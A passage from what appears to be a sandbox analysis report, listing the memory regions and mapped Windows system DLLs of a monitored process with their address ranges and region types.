1004 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1005 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1006 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1007 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1008 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1009 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1010 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1011 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1012 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1013 start_va = 0x76b60000 end_va = 0x76b89fff monitored = 0 entry_point = 0x76b612fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1014 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1015 start_va = 0x150000 end_va = 0x16dfff monitored = 0 entry_point = 0x16158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1016 start_va = 0x360000 end_va = 0x4e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 1017 start_va = 0x150000 end_va = 0x16dfff monitored = 0 entry_point = 0x16158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1018 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1019 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1020 start_va = 0x590000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1021 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1022 start_va = 0x840000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1023 start_va = 0x30000 end_va = 0x30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui") Region: id = 1024 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1025 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1026 start_va = 0x1d0000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1027 start_va = 0x1c40000 end_va = 0x1d7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1028 start_va = 0x1d80000 end_va = 0x1f00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1029 start_va = 0x1f10000 end_va = 0x2212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 1030 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1031 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1032 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1033 start_va = 0x2e0000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1034 start_va = 0x1d40000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1035 start_va = 0x1d80000 end_va = 0x1e80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1036 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1096 start_va = 0x1d0000 end_va = 0x1f8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1097 start_va = 0x200000 end_va = 0x228fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1098 start_va = 0x1c40000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1099 start_va = 0x2220000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1100 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1101 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1102 start_va = 0x22b0000 end_va = 0x3e07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022b0000" filename = "" Region: id = 1103 start_va = 0x3e10000 end_va = 0x4004fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 1104 start_va = 0x4010000 end_va = 0x4204fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004010000" filename = "" Region: id = 1106 start_va = 0x230000 end_va = 0x25cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1107 start_va = 0x1ce0000 end_va = 0x1d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1108 start_va = 0x1ea0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 1109 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1110 start_va = 0x765c0000 end_va = 0x766b4fff monitored = 0 entry_point = 0x765c1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1111 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1112 start_va = 0x75470000 end_va = 0x755a5fff monitored = 0 entry_point = 0x75471b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1113 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1114 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1115 start_va = 0x768b0000 end_va = 0x769d0fff monitored = 0 entry_point = 0x768b158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1116 start_va = 0x766c0000 end_va = 0x766cbfff monitored = 0 entry_point = 0x766c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1117 start_va = 0x76e50000 end_va = 0x7704afff monitored = 0 entry_point = 0x76e522d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1119 start_va = 0x4210000 end_va = 0x431afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004210000" filename = "" Region: id = 1120 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1121 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1126 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1127 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1128 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1129 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1130 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1131 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1132 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1133 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1134 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1135 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1136 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1137 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1138 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1139 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1140 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1141 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1142 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1143 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1144 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1145 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1146 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1147 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1148 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1149 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1150 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1151 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1152 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1153 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1154 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1155 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1156 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1157 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1158 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1159 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1160 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1161 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1162 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1163 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1164 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1165 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1166 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1167 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1168 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1169 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1170 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1171 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1172 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1173 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1174 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1175 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1176 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1177 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1178 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1179 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1180 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1181 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1182 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1183 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1184 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1185 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1186 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1187 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1188 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1189 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1190 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1191 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1192 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1193 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1194 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1195 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1196 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1197 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1198 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1199 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1200 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1201 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1202 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1203 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1204 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1205 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1206 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1207 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1208 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1209 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1210 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1211 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1212 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1213 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1214 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1215 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1216 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1217 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1218 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1219 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1220 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1221 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1222 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1223 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1224 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1225 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1226 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1227 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1228 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1229 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1230 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1231 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1232 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1233 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1234 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1235 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1236 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1237 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1238 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1239 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1240 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1241 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1242 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1243 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1244 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1245 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1246 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1247 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1248 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1249 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1250 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1251 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1252 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1253 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1254 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1255 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1256 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1257 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1258 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1259 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1260 start_va = 0x170000 end_va = 